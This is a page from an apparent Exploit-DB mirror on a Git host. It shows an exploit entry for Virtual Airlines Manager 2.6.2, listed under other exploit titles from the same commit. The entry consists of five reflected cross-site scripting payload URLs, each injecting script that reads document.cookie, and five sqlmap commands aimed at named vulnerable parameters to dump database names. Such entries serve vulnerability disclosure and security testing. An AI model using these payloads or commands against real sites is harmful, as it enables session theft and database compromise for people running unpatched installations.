bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/48574.txt
Offensive Security 6ec646f7e1 DB: 2020-06-11 
10 changes to exploits/shellcodes

Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC)
Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC)
Savant Web Server 3.1 - Denial of-Service (PoC)
ALLPlayer 7.5 - Denial of-Service (PoC)
10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)
WinGate 9.4.1.5998 - Insecure Folder Permissions

HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)
Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)
Joomla J2 Store 3.3.11 - 'filter_order_Dir'  SQL Injection (Authenticated)
Virtual Airlines Manager 2.6.2 - 'id' SQL Injection
2020-06-11 05:02:06 +00:00

24 lines
No EOL
1.3 KiB
Text
Raw Blame History

# Exploit Title: Virtual Airlines Manager 2.6.2 - 'id' SQL Injection
# Date: 2020-06-09
# Exploit Author: Mosaaed
# Vendor Homepage: http://virtualairlinesmanager.net/
# Dork: N/A
# Affected Version: 2.6.2
# Tested on: Ubuntu
# CVE : N/A
-------------------
xss
http://localhost/vam/index.php?page=plane_info_public&registry_id=“><<script>alert(document.cookie);//<</script>
http://localhost/vam/index.php?page=fleet_public&plane_icao=1“><<script>alert(document.cookie);//<</script>
http://localhost/vam/index.php?page=hub&hub_id=1“><<script>alert(document.cookie);//<</script>
http://localhost/vam/index.php?page=fleet_public&plane_location=1“><<script>alert(document.cookie);//<</script>
http://localhost/vam/index.php?page=event&event_id=1“><<script>alert(document.cookie);//<</script>
-------------------------
SQL Injection
sqlmap -u "http://localhost/vam/index.php?page=manual_flight_details&ID=10" -p ID --dbs
sqlmap -u "http://localhost/vam/index.php?page=plane_info_public&registry_id=10" -p registry_id --db
sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_icao=1" -p plane_icao --dbs
sqlmap -u "http://localhost/vam/index.php?page=hub&hub_id=1" -p hub_id --dbs
sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_location=1" -p plane_location --dbs
Reference in a new issue View git blame Copy permalink